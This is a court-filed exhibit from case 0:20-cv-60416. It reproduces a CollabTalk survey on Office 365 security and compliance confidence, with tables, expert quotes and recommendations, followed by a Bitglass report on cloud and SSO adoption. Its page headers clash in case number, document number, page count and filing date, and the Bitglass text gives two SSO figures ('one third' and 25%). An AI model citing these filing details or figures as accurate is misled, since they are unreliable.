Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 432 of
726
Case 0:20-cv-60416-XXXX   Document 1-33 Entered on FLSD Docket 02/26/2020   Page 26 of
726

*Table 8 - How confident are you that the services and solutions are meeting organizational and industry security standards?*

| Field | Minimum | Maximum | Mean | Std Deviation | Variance |
|---|---|---|---|---|---|
| Exchange | 1.00 | 7.00 | 5.20 | 1.63 | 2.67 |
| OneDrive for Business | 1.00 | 7.00 | 4.64 | 1.89 | 3.59 |
| SharePoint | 1.00 | 7.00 | 4.63 | 1.84 | 3.38 |
| Skype for Business | 1.00 | 7.00 | 4.83 | 1.70 | 2.89 |
| Microsoft Teams | 1.00 | 7.00 | 4.67 | 1.82 | 3.32 |
| Office 365 Groups | 1.00 | 7.00 | 4.70 | 1.90 | 3.61 |
| Yammer | 1.00 | 7.00 | 4.50 | 2.04 | 4.16 |
| Power BI | 1.00 | 7.00 | 4.75 | 2.10 | 4.40 |
| Planner | 1.00 | 7.00 | 4.69 | 2.08 | 4.34 |
| PowerApps | 1.00 | 7.00 | 4.95 | 2.06 | 4.26 |
| Microsoft Flow | 1.00 | 7.00 | 5.09 | 2.00 | 3.99 |
| Microsoft Forms | 0.00 | 7.00 | 4.38 | 2.34 | 5.47 |
| Other | 4.00 | 4.00 | 4.00 | 0.00 | 0.00 |

The advisory panel was surprised by some of these responses, as captured by Joanne Klein:

> *"This one surprises me a bit. Perhaps Microsoft Flow is #1 because there's been a better job at educating people on DLP around it? Generally, it appears non-IT people have the most confidence in the Power Tools."*

While our research did not explore the features and limitations of each of the workloads, what it did provide was a perspective of where respondents are putting their trust – highlighting areas which organizations may want to review and ensure that internal and external requirements are being met.

As one of the fastest-growing products in Microsoft's history, Microsoft Teams landed in the bottom half of the confidence scale. Whether the lower scoring is due to perceptions or concerns over specific security and compliance deficiencies is undetermined within our study, but as Eric Overfield suggests, it's becoming too important a component for organizations to ignore:

> *"As with compliance, we are seeing a lack of confidence around security for Microsoft Teams. There is such room for mistakes with Microsoft Teams that the Compliance Officers must get their heads around. Simply turning off Microsoft Teams, which is destined to be the canvas of the digital workplace, is not an option. Teams provides far too much power for end users to ignore, they will jump instead to other 3rd party solutions, i.e. shadow IT."*

As we explored respondent confidence within the Office 365 compliance capabilities, you can once again see a similar pattern: people have high confidence in their own primary workloads, and low confidence in the systems they do not actively use. As shown in *Table 9* - If audited, how confident are you that your

CollabTalk

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 433 of 726

organization is meeting or exceeding industry compliance standards?, overall respondents are reasonably confident that their primary workloads would pass an unexpected audit.

*Table 9 - If audited, how confident are you that your organization is meeting or exceeding industry compliance standards?*

|  | Minimum | Maximum | Mean | Std Deviation | Variance |
|---|---|---|---|---|---|
| Confidence level | 0.00 | 7.00 | 4.13 | 1.66 | 2.74 |

*Table 10 - How confident are you that the services and solutions are meeting all organizational and industry compliance standards?*

| Field | Minimum | Maximum | Mean | Std Deviation | Variance |
|---|---|---|---|---|---|
| Exchange | 0.00 | 7.00 | 4.64 | 1.71 | 2.91 |
| OneDrive for Business | 1.00 | 7.00 | 4.35 | 1.76 | 3.11 |
| SharePoint | 1.00 | 7.00 | 4.29 | 1.71 | 2.92 |
| Skype for Business | 2.00 | 7.00 | 4.73 | 1.62 | 2.64 |
| Microsoft Teams | 1.00 | 7.00 | 4.33 | 1.77 | 3.13 |
| Office 365 Groups | 1.00 | 7.00 | 4.47 | 1.77 | 3.13 |
| Yammer | 1.00 | 7.00 | 4.27 | 2.00 | 4.02 |
| Power BI | 1.00 | 7.00 | 4.18 | 2.19 | 4.79 |
| Planner | 1.00 | 7.00 | 4.06 | 2.11 | 4.43 |
| PowerApps | 1.00 | 7.00 | 4.68 | 2.18 | 4.74 |
| Microsoft Flow | 1.00 | 7.00 | 4.86 | 2.18 | 4.75 |
| Microsoft Forms | 1.00 | 7.00 | 4.50 | 2.10 | 4.39 |
| Other | 4.00 | 4.00 | 4.00 | 0.00 | 0.00 |

Another interesting insight the research team reviewed was how specific roles responded to these questions. Specifically, the differences between respondents identifying as Compliance Officers to Executives (some additional data points are included within the Appendix).

The Compliance Officer is typically a middle-manager role outside of IT, and as shown in *Figure 5,* the confidence that respondents have in some of the newest Microsoft solutions was surprising to our advisory panel, while some of the most mature solutions (SharePoint and Exchange) fall to the bottom half.

CollabTalk

Commented Antonio Maio:

> *"Again, I'm surprised that Compliance Officers feel most comfortable in the compliance capabilities of Microsoft Flow.  Microsoft Flow is still a relatively young product, and its security and compliance capabilities are still maturing.  With Microsoft Flow's ability for any user to send data to any endpoint on the internet, we certainly hope that organizations are using and enforcing the data loss prevention policies that are available with Microsoft Flow in order to mitigate risks of data exposure."*



*Figure 5 - Confidence by Role: Compliance Officer*

What this data illustrates, emphasized by the feedback the panel advisors, is that there is clearly a gap in respondent understanding of the security and compliance capabilities across most of the Microsoft offerings. The research team observed through individual interviews that the more familiar the respondents were with the workload, the more critical they were about granular security and compliance capabilities. The less familiar they were with a workload, the more they trusted in the high-level product marketing messaging—until they were asked more detailed questions about the individual workloads, at which point their confidence levels decreased.

Eric Overfield continued with his commentary on Microsoft Teams:

> *"Compliance Officers lack of confidence in regard to Microsoft Teams is a cause for concern. Teams is being piloted and adopted by hundreds of thousands of organizations. The conversations that are happening there have to be secured and compliancy must be maintained as with any other form of communication or collaboration. Compliance Officer training and support with Microsoft Teams must become top of mind for most organizations."*

CollabTalk

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 435 of 726

The confidence levels from survey respondents identifying as Executives or Senior Leaders was much more in-line with what the advisory panel expected to see from this data, as shown in *Figure 6 - Confidence by Role: Executive / Senior Leader*



*Figure 6 - Confidence by Role: Executive / Senior Leader*

Stated Antonio Maio:

> *"Confidence in the compliance capabilities of SharePoint is in line with what we see in the market from executives and senior leadership. SharePoint has a long history of storing and enabling collaboration on sensitive data, and its compliance capabilities have evolved significantly over time."*

As stated earlier, the additional questions around the more granular features showed that when asked for specifics versus general confidence / awareness, survey respondents showed less organizational bias, with most answers trending down.

*Table 11 - How often do you use the Alerts feature?*

| Answer | % |
|---|---|
| Never | 39.06% |
| Sometimes | 35.94% |
| About half the time | 9.38% |
| Most of the time | 10.94% |
| Always | 4.69% |

*Table 12 - Do you use Labels for classification?*

| Question | Never | Sometimes | About half the time | Most of the time | Always |
|---|---|---|---|---|---|
| Office 365 Labels | 49.18% | 26.23% | 6.56% | 11.48% | 6.56% |
| Custom or 3rd-party classification solution | 63.33% | 15.00% | 3.33% | 8.33% | 10.00% |

CollabTalk

Table 13 - How often do you use the Data Loss Prevention (DLP) feature?

| Answer | % |
|---|---|
| Never | 36.67% |
| Sometimes | 26.67% |
| About half the time | 10.00% |
| Most of the time | 13.33% |
| Always | 13.33% |

Table 14 - How often do you use these data governance features?

| Question | Never | Sometimes | About half the time | Most of the time | Always |
|---|---|---|---|---|---|
| PST Import | 64.91% | 22.81% | 1.75% | 8.77% | 1.75% |
| Content Archive | 42.86% | 30.36% | 5.36% | 12.50% | 8.93% |
| Content Retention | 33.93% | 23.21% | 12.50% | 17.86% | 12.50% |
| Content Dispositions | 48.21% | 19.64% | 10.71% | 12.50% | 8.93% |
| Supervisory Review | 51.79% | 21.43% | 3.57% | 10.71% | 12.50% |

Table 15 - How often do you use these threat management features?

| Question | Never | Sometimes | About half the time | Most of the time | Always |
|---|---|---|---|---|---|
| Attack Simulator | 50.00% | 20.83% | 6.25% | 14.58% | 8.33% |
| ATP Anti-phishing | 42.86% | 18.37% | 4.08% | 18.37% | 16.33% |
| ATP Safe Attachments | 43.75% | 16.67% | 8.33% | 12.50% | 18.75% |
| ATP Safe Links | 47.92% | 14.58% | 6.25% | 12.50% | 18.75% |
| Anti-spam | 27.08% | 18.75% | 6.25% | 14.58% | 33.33% |
| DKIM | 44.44% | 15.56% | 6.67% | 17.78% | 15.56% |
| Anti-malware | 29.17% | 20.83% | 6.25% | 16.67% | 27.08% |
| Message Trace | 29.17% | 33.33% | 8.33% | 18.75% | 10.42% |

Table 16 - How often do you use these data privacy features?

| Question | Never | Sometimes | About half the time | Most of the time | Always |
|---|---|---|---|---|---|
| GDPR Dashboard | 54.00% | 24.00% | 4.00% | 8.00% | 10.00% |
| DSR Request | 64.58% | 16.67% | 4.17% | 8.33% | 6.25% |

CollabTalk

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 437 of 736

*Table 17 - How often do you use these search & investigation features?*

| Question | Never | Sometimes | About half the time | Most of the time | Always |
|---|---|---|---|---|---|
| Content Search | 16.33% | 22.45% | 24.49% | 8.16% | 28.57% |
| Audit Log Search | 22.45% | 26.53% | 18.37% | 10.20% | 22.45% |
| eDiscovery | 26.53% | 26.53% | 16.33% | 6.12% | 24.49% |
| Cloud App Security | 32.65% | 26.53% | 2.04% | 18.37% | 20.41% |

Another interesting data pivot is to understand where third-party tools are in use, which may indicate one of three things:

1. Low confidence in the comparable out-of-the-box features
2. Education / awareness issue with comparable out-of-the-box features
3. Missing features in the platform



*Figure 7 - What other third-party or custom-built solutions does your organization use for security and compliance?*

Eric Overfield showed some concern over the low number of respondents using third-party cyber-security tools, stating:

> *"Only 13.5% of respondents are using cyber security 3rd party tools, that appears to me to be far too low than what we would want to see. Security has to be top of mind of organizations."*

However, this may also reflect the strengthening cyber-security story from the out-of-the-box Office 365 capabilities in which customers are finding that they no longer need to purchase additional solutions to augment their platforms. Based on industry data, however, a more likely scenario is that they are not fully

CollabTalk

Case 0:20-cv-60416-XXXX   Document 1-33   Entered on FLSD Docket 02/26/2020   Page 32 of 726

aware of the gaps in their cyber-security strategies and are overly reliant on Microsoft and other key solution providers.

Antonio Maio makes a similar point:

> *"This is an interesting outcome – and is in line with some client environments and the needs of Compliance Officers. Where we recommend backup of content from Office 365, to either on-premises systems or to other cloud hosted backup systems, is to meet specific regulatory compliance needs where maintaining full backups of all corporate content is a strict requirement.*
>
> *"From a security and compliance perspective, our clients are often investing in third-party tools for data loss prevention, identity and access management, and advanced control of privileged user access.  As well, as part of digital transformation initiatives, we often see organizations invest in third-party tools for data and solution migration.  In addition, we see third-party tool investment in records management tools for compliance with record retention requirements in the Microsoft Cloud continuing to occur.  Microsoft's tool set for record retention and record management in their Cloud offerings has made significant advancements recently, but there are still some gaps that require the use of third-party tools."*

As shown in

*Table 18 - Reasons for using 3rd party solutions*, we then asked the survey respondents to share their reasoning for using these outside tools and solutions. Interestingly, there were no categories in which the majority of respondents believed these third-party tools to be better than what Office 365 provides.

*Table 18 - Reasons for using 3rd party solutions*

| Question | I have a very specific need that only this tool can address | My company bought this tool/legacy application | I believe this tool to be better than what Microsoft can provide in the cloud |
|---|---|---|---|
| Back Up/Recovery | 31.82% | 45.45% | 22.73% |
| Data/Solution Migration | 33.33% | 33.33% | 33.33% |
| Compliance/Auditing | 23.08% | 30.77% | 46.15% |
| eDiscovery/Legal | 8.33% | 50.00% | 41.67% |
| Cyber-Security | 27.27% | 27.27% | 45.45% |
| User/Org Provisioning | 20.00% | 80.00% | 0.00% |
| Lifecycle Management | 40.00% | 30.00% | 30.00% |
| End-to-end Admin/ Automation | 40.00% | 40.00% | 20.00% |

According to Antonio Maio:

> *"This is very much in line with what we see in the market.  Third-party tools for data and solution migration are often utilized by consultants working in client environments,*



Case 0:20-cv-60416-XXXX   Document 1-83   Entered on FLSD Docket 02/26/2020   Page 33 of
735

> *where solutions for backup/recovery are often utilized by internal company staff such as
> IT managers or administrators."*

Finally, we asked the survey respondents whether they believed the current security and compliance
features were sufficient for their organizational requirements. For security features, a strong majority
(66.67%) agreed the Office 365 "Definitely Yes" or "Probably Yes" met all of their requirements. However,
for compliance features, just under half (45.1%) of respondents agreed that it "Definitely" or "Probably"
met all of their requirements, with the largest response being "Might or Might Not." Once again, the
research team believes this can be attributed to the education gap around Office 365 compliance
capabilities.

*Table 19 - Do you think the current security protection for Office 365 is sufficient?*

| Answer | % |
| --- | --- |
| Definitely yes | 19.61% |
| Probably yes | 47.06% |
| Might or might not | 19.61% |
| Probably not | 11.76% |
| Definitely not | 1.96% |

*Table 20 - Do you think the current compliance capabilities in Office 365 are sufficient?*

| Answer | % |
| --- | --- |
| Definitely yes | 15.69% |
| Probably yes | 29.41% |
| Might or might not | 33.33% |
| Probably not | 13.73% |
| Definitely not | 7.84% |

CollabTalk

Case 0:20-cv-60416-XXXX   Document 1-33   Entered on FLSD Docket 02/26/2020   Page 54 of
726

# Overall Analysis and Recommendations

At its core, Office 365 operates some of the most secure data centers in the world, adhering to Microsoft's internally-developed Security Development Lifecycle. Many of the best practices were developed over decades of Microsoft's own enterprise software development efforts, and since the late 1990's, this has included a host of online services. Per the Microsoft Trust Center[7]:

> *Office 365 is verified to meet the requirements specified in ISO 27001, European Union (EU) Model Clauses, the Health Insurance Portability and Accountability Act Business Associate Agreement (HIPAA BAA), and the Federal Information Security Management Act (FISMA). Our data processing agreement details the privacy, security, and handling of customer data, which helps you comply with local regulations.*

The Office 365 platform provides enterprise-grade user and administrator controls, giving organizations the ability to manage and scale their environments with the assurance that all physical, logical, and data security layers adhere to industry best practices (or better).  Microsoft makes continuous improvements to the security of the Office 365 platform, from port and perimeter scanning to regular auditing of operator/administrator activities and access.

While organizations need to understand how they are meeting their security and compliance needs today, and how Microsoft can improve on that, customers of Office 365 are ultimately responsible for their own data. Microsoft provides broad oversight of the service plan, including service uptime and SLAs. Customer requirements for security and compliance will likely extend beyond these capabilities – and organizations need to understand the limitations of their service plans and have strategies in place to mitigate these gaps.

However, the top issue identified by respondents was not the technology, but administrator and end user education:

- When asked how Microsoft could enhance the security of their products, 83% of respondent requested more assistance in understanding and implementing Microsoft products.

- Of those that thought Microsoft security was sufficient, 80% of respondents have either not run security and compliance checks, or do not know if they have.

- Of those who did not think the current security protection offered by Microsoft was sufficient, 57% of respondents were not aware of Microsoft's security division.

- Of those who did not think the current security protection offered by Microsoft was sufficient, 71% of respondents were not aware of Microsoft's overall security and compliance strategy.

The overall governance of your Office 365 environment has less to do with the technology and more to do with the practices and procedures you put in place to administrate your information assets. Office 365 provides the tools and capabilities you require to develop sound governance standards and meet your internal and industry-defined governance requirements.

---

[7] https://products.office.com/en/business/office-365-trust-center-compliance



Case 0:20-cv-60416-XXXX   Document 3-13 Entered on FLSB Docket 02/26/2020   Page 441 of
726
Case 0:20-cv-60416-XXXX   Document 1-33 Entered on FLSD Docket 02/26/2020   Page 35 of
726

On the reliance on Office 365 to meet most, if not all, of your security and compliance requirements,
Microsoft MVP Erica Toelle (@EricaToelle), a Product Evangelist at RecordPoint in Seattle, Washington,
commented:

> *Before the cloud, people managed security and compliance all on their own.*
> *Outsourcing this to Microsoft is a good idea. Microsoft has more budget to hire the*
> *industry-leaders, so they are more secure. People don't perceive this because their*
> *understanding is immature. They don't know how much Microsoft is protecting them or*
> *not. They also don't really have complete control over the situation.*

Based on our primary and secondary research, six key recommendations were identified to improve
organizational security and compliance practices within Office 365:

1. **Approach security and compliance more holistically**, looking at it as an integrated business solution
   rather than through functional silos or individual workloads. Make each topic part of your existing or
   future governance oversight committee meetings, as review and management of security and
   compliance issues will likely comprise a large portion of your ongoing operational activities. Develop
   metrics for each workload that will be meaningful at the company-level, as well as the business unit or
   team-level and provide deeper insights into how different user groups are adhering to company
   security and compliance standards.

2. **Identify feature gaps and create an operational strategy** for those gaps, allowing CSOs, IT Managers, and
   other key business stakeholders to understand the features and limitations of each workload within
   Office 365 (For example, OneDrive can only restore deleted files for 93 days[8]) and more transparently
   manage employee expectations.

3. **Conduct scheduled inventory audits** on a regular basis to help clean up and classify data and improve
   information architecture (IA) across the board. Setting security and compliance policies is difficult
   when managers and employees do not know the state and disposition of their information assets.
   Audits provide visibility, and present opportunities to re-evaluate the priority of information assets, as
   well as to make policies and procedures around the content lifecycle clear to everyone.

4. **Create a training plan to better disseminate policies and procedures** that moves beyond one-time
   training and makes awareness of security and compliance standards part of a mandatory education
   plan. Training plans that incorporate multiple tools and distribution methods are always more effective
   than simply providing a digital training PDF or posting a single training video to the company intranet.
   Organizations should take the time to create training assets that match the learning culture within the
   organization, providing self-help tools (videos, content, internal quizzes) and both formal and informal
   sessions (classroom, brown bags, ask me anything (AMA) discussions) to reach the broadest audience.

5. **Develop necessary governance and change management programs and committees** to advance these
   ideas, support transparency, and to hold the organization accountable. This is especially critical as the
   pace of the Office 365 change release process is incredibly fast (including monthly and weekly builds),
   and organizations can easily miss key improvements or new features if they fail to stay on top of these
   releases.

---

[8] https://support.office.com/en-us/article/restore-deleted-files-or-folders-in-onedrive-949ada80-0026-4db3-a953-
c99083e6a84f


CollabTalk

Case 0:20-cv-60416-AMC   Document 3-13 Entered on FLSB Docket 02/26/2020   Page 442 of 726

6. **Better leverage the latest technology**, getting "out in front of it" by "dogfooding" the latest features (pilots) to understand how new features can be utilized. More than ever, Microsoft tries to provide business guidance and user scenarios for all new features and capabilities, documenting administrator and end user guidance to help customers quickly adopt. Organizations that create an environment where new features are quickly testing and deployed will have a distinct competitive advantage over those who fail to adapt and adopt new solutions. This is especially true with security and compliance features, which can have an immediate impact through risk reduction.

On the idea of starting your planning with an audit, Eric Overfield stated:

> *"Companies need the right person (expertise) to run audits and decide to dedicate resources to security and compliance. You need someone who intrinsically understands common situations and holes in security. You need to start with an audit, then you need to lock things down. Network, workstations, client data. Go after security first and then compliance."*

Microsoft's high-level guidance for Office 365 on the topics of security and compliance is straight-forward: monitor and proactively manage. Along with your users, data is the lifeblood of your organization. As a result, it's critical to lay the groundwork to lock down access, manage the content (and end user) lifecycle, and protect your system from risk – and external threats.

To accomplish this, Microsoft recommends leveraging the Security & Compliance Center to:

- Set up and monitor alerts
- Regularly review access and usage reports
- Use the Threat Intelligence tools to research and respond to threats
- Filter and quarantine your organization's email
- Follow all of Microsoft's recommendations, based on your license types and usage patterns
- Leverage the new Advanced Security Management features to investigate and mitigate potential issues
- Regularly check your Office 365 Secure Score to identify areas for improvement

A cohesive, holistic and practical approach to governance is required for platforms like Office 365, where the reach is extensive. With the simplification of development practices in the move to a cloud environment, you now are able to more easily shift resources to concentrate on process and governance where doing so was difficult in the past.

When approaching governance of your Office 365 environment, is it important to review your strategy and tactical plans to execute your strategy. Consider each of these four areas:

### Foundation

Set the ground rules for how your platform operates and what information technology security parameters it must operate in to remain secure and compliant. Address the structure and support your organization will provide to keep your environment in working order.

### Administration

Placing an emphasis on teamwork between your administrative teams will streamline issue resolution and promote the nature of the platform's collaboration core. As with any team environment, definition of roles and responsibilities will be key to success. Also be sure to set a clear vision for the future in order for your administrators to manage your environment with the future in mind.



Case 0:20-cv-60416-XXXX   Document 1-83   Entered on FLSB Docket 02/26/2020   Page 37 of
35

### Communication

One of the clearest forms of collaboration is communication. Be straightforward and open when it comes to your Office 365 platform. Just as nature abhors a vacuum, successful communication requires collaboration with management, stakeholders, and your end users. Bring your voice and vision to the forefront and give your employees a voice in the process.

### Adoption

Focus resources on user engagement, awareness and recognition in order to ensure adoption of new features. Empowering your end users will encourage them to explore and become personally invested in the technology and how it can benefit their day to day work.

There are many great online resources available with guidance on how to approach modern governance. While Microsoft provides many of the tools and guidance you need to build and maintain your governance standards, also take advantage of Microsoft's incredibly strong partner ecosystem and community of experts and practitioners to leverage the wisdom of the crowd – in addition to your own internal expertise.

On this point, long-time Microsoft MVP Matthew McDermott (@MatthewMcD), Principal Technical Marketing Engineer at Spanning Cloud Apps, stated:

> *"Companies should invest in personnel and tools to ensure compliance and secure systems.  It's not enough, with today's threat landscape, to be reactive.  We need to be proactive in our approach to keeping our assets and customer data safe and secure."*

His guidance was echoed by Antonio Maio:

> *"Overall, we see security and compliance knowledge and requirements within the enterprise maturing at a steady pace.  As our cloud environments evolve with new capabilities, and as new threats come onto the landscape, there is a need for compliance officers, security teams, IT managers and senior leadership to continue to invest in and mature their understanding of what compliance in the cloud looks like, how they demonstrate compliance in the cloud, what tools are available to them and what tools are right for specific tasks.  Annual training for end users on corporate information security policies is still highly recommended for all organizations to address many of the challenges faced.  Finally, rolling out new cloud capabilities to end users in a well-defined and controlled manner is also highly recommended, so that information workers have the tools they need to be productive day to day and so that IT, Security and Compliance teams have appropriate controls in place to meet corporate security and compliance requirements."*

The first step in moving forward is to understand your security and compliance goals and priorities.



Case 0:20-cv-60416-XXXX   Document 1-33   Entered on FLSD Docket 02/26/2020   Page 38 of 726

## Advisory Panel

**Liam Cleary**
CEO/Owner at SharePlicity, and
Product Owner - Security at
Rencore
Microsoft MVP
@helloitsliam
linkedin.com/in/liamcleary/

**Jussi Roine**
Chief Research Officer at Sulava
Microsoft MVP & RD
@JussiRoine
linkedin.com/in/jroine/

**Eric Overfield**
President of PixelMill
Microsoft MVP & RD
@ericoverfield
linkedin.com/in/ericoverfield/

**Antonio Maio**
Associate Director & Senior
Enterprise Architect at Protiviti
Microsoft MVP
@AntonioMaio2
linkedin.com/in/antonio-maio-
b082191/

**Joanne Klein**
SharePoint Consultant at NexNovus
Consulting
Microsoft MVP
@JoanneCKlein
linkedin.com/in/joannecklein/

**Joel Oleson**
Sr. Manager at Blizzard Entertainment
Microsoft MVP & RD
@joeloleson
linkedin.com/in/joeloleson/

**Richard Harbridge**
CTO at 2toLead
Microsoft MVP
@rharbridge
linkedin.com/in/rharbridge/

**Nicki Borell**
Managing Consultant at Xperts at Work
Microsoft MVP & RD
@NickiBorell
linkedin.com/in/nicki-borell/

**Brian Culver**
Enterprise Solutions Architect & Consultant
at Expert Point Solutions
@SPBrianCulver
linkedin.com/in/bculver



## Sponsors



Microsoft develops, manufactures, licenses, supports and sells computer software, consumer electronics, personal computers, and services. Our mission is to empower every man and every organization on the planet to achieve more.
www.Microsoft.com



Spanning Cloud Apps, a Kaseya company, is the leading provider of backup and recovery for SaaS applications, helping organizations around the globe protect their information in the cloud. The company provides powerful, enterprise-class data protection for Microsoft Office 365, G Suite, and Salesforce. With data centers located in North America, the EU, and Australia, Spanning Backup is the most trusted cloud-to-cloud backup solution for thousands of companies and millions of users around the world. Learn more at www.spanning.com. Follow Spanning on Twitter @spanningbackup. www.Spanning.com



RecordPoint is a global records management and compliance solution provider and pioneer of cloud-based recordkeeping. Recognized as a Cool Vendor by Gartner in 2018, RecordPoint is leading the way in the content services segment and providing organizations with the ability to manage records from across multiple services and platforms using a single, federated solution.

With support for Office 365, SharePoint, File Shares, E-mail, Box, Dropbox, G-Suite and many other applications, RecordPoint demonstrates how easy federated compliance can be with a modern, trusted cloud solution. www.RecordPoint.com



tyGraph is an award-winning software company that provides intelligent tools for better collaboration, using Machine Learning (ML) and Artificial Intelligence (AI) platforms to extract the strongest signals from the billions of rows of data processed for our customers each month. Many Fortune 500 companies across the globe trust tyGraph to deliver the analytics they need to take action on insights. www.tyGraph.com



Rencore is a software company providing award-winning solutions essential to the SharePoint and Office 365 space. The Rencore Platform is based on four pillars: App Security, App Governance, App Management, and App Modernization. The Rencore Platform securely automates everyday tasks, finds app issues and vulnerabilities in the DevOps process, and discovers and monitors customizations in the Pre-Production, Production or Modernization phases. www.Rencore.com

## In-Kind











Case 0:20-cv-60416-XXXX   Document 1-34   Entered on FLSD Docket 02/26/2020   Page 4 of 11
726
Case 0:20-cv-60416-AMC   Document 2-1   Entered on FLSD Docket 02/26/2020   Page 446 of

# EXHIBIT 32







The growing popularity of the cloud has given rise to a host of different cloud-based tools. Messaging apps like Slack enable rapid communication, file sync and share apps like Box enable instant collaboration, while single sign-on providers like Okta can authenticate users across all applications.

To learn about the rate at which companies are adopting cloud services, Bitglass performed an automated analysis of over 135,000 corporate email domains. In so doing, the Next-Gen CASB uncovered adoption rates for popular cloud apps, AWS, and single sign-on (SSO)—read on for more information.

# SECURITY TRAILS CLOUD

*Since Bitglass conducted its first cloud adoption study in 2014, organizations everywhere have continued their rapid migration to the cloud. In 2018, global cloud adoption reached an all-time high of 81%, as measured by enterprise use of major cloud productivity platforms. However, only one third of those organizations are deploying single sign-on. This discrepancy between cloud adoption and cloud security suggests that breaches will continue to plague two thirds of organizations making use of the cloud.*

## CLOUD ADOPTION



| | |
|---|---|
| 100% | |
| 75% | **81%** (2018) |
| | **59%** (2016) |
| 50% | |
| 25% | **24%** (2014) |
| 0% | |

# OFFICE 365 DEPLOYED IN MAJORITY OF ENTERPRISES WORLDWIDE

*Despite G Suite's early advantage, Microsoft Office 365 has continued its ascension as the cloud app suite of choice. Over half of organizations have now deployed Office 365, while G Suite adoption seems to have slowed to a halt.*

### Office 365 & G Suite



*To secure their growing collections of cloud apps, an estimated 25% of organizations are now using single sign-on (SSO) solutions to authenticate users.*

| Office 365 | G Suite | Slack | Box |
|---|---|---|---|
| 56.3% | 24.8% | 42.9% | 16.6% |

| Salesforce | AWS | SSO in Use |
|---|---|---|
| 11.0% | 13.8% | 25.0% |



# AWS ADOPTION REVEALED

*Infrastructure as a service (IaaS) solutions offer user-friendly, scalable IT infrastructure and reduce the need for costly, on-premises hardware. Many organizations use these platforms to store their data in the cloud and build custom applications. Despite the growth of competitors like Microsoft Azure and Google Cloud Platform, Amazon Web Services (AWS) has quickly emerged as the go-to choice for IaaS in every analyzed industry.*

*On average, 13.8% of companies worldwide are using AWS.*

*At 21.5% adoption, technology firms are making the most use of AWS.*

| Industry | AWS |
|----------|------|
| Technology | 21.5% |
| Education | 19.7% |
| Media | 15.3% |
| Agriculture | 13.3% |
| Finance | 11.6% |
| Healthcare | 11.5% |
| Retail | 9.0% |



# INDUSTRY BREAKDOWN

**Education has top adoption in multiple apps** (44.1% for G Suite and 25% for Box). This is consistent with prior years and is likely due to the discounts vendors offer the industry.

**Less than half of retailers have deployed Office 365** and fewer than 1 in 10 use AWS. Due to large investments in existing IT infrastructure, these organizations are less likely to use cloud than others.

In addition to leading in AWS adoption (21.5%), **technology has high rates of adoption across all SaaS apps** analyzed.

In regulated industries, **use of Office 365 has nearly doubled since 2016**—from 31.5% to 57.3% in finance, and from 30.9% to 57.3% in healthcare.

## Office 365 adoption



| | FINANCE | | HEALTHCARE |
|---|---|---|---|
| 2016 | 31.5% | 2016 | 30.9% |
| 2018 | 57.3% | 2018 | 57.3% |



Case 3:20-cv-06754-WHA Document 844 Filed 06/26/2023 Page 453 of 726

# SECURE SECTORS

**Education is the leading adopter of single sign-on (40.3%).** SSO can be helpful for provisioning and deprovisioning students and faculty.

Like with cloud apps, **engineering (11.2%) and retail (15.9%) have the lowest SSO adoption rates.**

**The finance industry is a top adopter of single sign-on (29.3%).** Authentication is critical when protecting personally identifiable information (PII).



**EDUCATION**
## 40.3%



**RETAIL**
## 15.9%



**FINANCE**
## 29.3%



# CLOUD ADOPTION BY ORGANIZATION SIZE

*All analyzed cloud apps are adopted the most by large enterprises (over 1,000 employees), the second most by medium-sized organizations (500-1,000 employees), and the least by small businesses (under 500 employees). As companies grow, they are more likely to adopt a breadth of cloud applications in order to increase productivity and collaboration across all of their departments.*

**More than twice as many large enterprises (44.1%) use SSO as small businesses (17.9%).**

| Size | AWS Customer | Overall SSO |
|---|---|---|
| Under 500 | 10.8% | 17.9% |
| 500-1000 | 15.8% | 35.1% |
| Over 1000 | 22.1% | 44.1% |

| Size | Office 365 Customer | G Suite Customer | Slack Customer | Box Customer | Salesforce Customer |
|---|---|---|---|---|---|
| Under 500 | 49.6% | 24.1% | 37.8% | 12.7% | 8.8% |
| 500-1000 | 73.4% | 24.3% | 50.1% | 21.8% | 14.2% |
| Over 1000 | 73.7% | 25.8% | 57.7% | 28.0% | 18.3% |





# WRAP-UP

Across all industries, adoption of cloud apps, SSO, and AWS is continuing to grow. With these new tools come new challenges and a need for new security solutions. Fortunately, cloud access security brokers (CASBs) are built for the cloud and can provide comprehensive visibility and control wherever data goes. To learn more, download the *Definitive Guide to CASBs.*

## bitglass

Phone: (408) 337-0190
Email: info@bitglass.com

www.bitglass.com

# *ABOUT BITGLASS*

Bitglass, the Next-Gen CASB company, is based in Silicon Valley with offices worldwide. The company's cloud security solutions deliver zero-day, agentless, data and threat protection for any app, any device, anywhere. Bitglass is backed by Tier 1 investors and was founded in 2013 by a team of industry veterans with a proven track record of innovation and execution.

## 2018 ADOPTION

| Industry | Office 365 | G Suite | Slack | Box | Salesforce | AWS | SSO in Use |
|---|---|---|---|---|---|---|---|
| Agriculture | 64.1% | 23.1% | 42.6% | 17.4% | 8.0% | 13.3% | 28.1% |
| Biotechnology | 62.2% | 21.9% | 35.8% | 20.3% | 8.7% | 14.6% | 27.5% |
| Construction | 60.2% | 19.9% | 38.7% | 15.9% | 9.8% | 10.9% | 23.8% |
| Consulting | 51.6% | 29.1% | 40.5% | 13.3% | 7.2% | 12.9% | 17.4% |
| Education | 71.1% | 44.1% | 57.6% | 25.7% | 16.7% | 19.7% | 40.3% |
| Energy | 73.5% | 19.4% | 44.8% | 24.4% | 13.7% | 15.3% | 37.7% |
| Engineering | 50.2% | 18.7% | 28.6% | 7.8% | 3.2% | 6.6% | 11.2% |
| Finance | 58.0% | 17.3% | 39.2% | 17.6% | 12.5% | 11.6% | 29.3% |
| Government | 61.5% | 21.3% | 45.7% | 19.2% | 13.4% | 18.8% | 31.8% |
| Healthcare | 57.2% | 19.2% | 35.6% | 13.2% | 8.9% | 11.5% | 23.3% |
| Hospitality | 61.4% | 23.7% | 40.8% | 14.6% | 6.9% | 11.9% | 22.3% |
| Media | 48.1% | 33.8% | 46.8% | 16.4% | 9.2% | 15.3% | 21.6% |
| Not for Profit | 61.6% | 28.8% | 45.6% | 16.1% | 9.9% | 15.6% | 22.6% |
| Other | 51.9% | 23.0% | 43.3% | 17.0% | 12.7% | 13.0% | 25.9% |
| Retail | 47.8% | 24.2% | 34.2% | 11.7% | 5.8% | 9.0% | 15.9% |
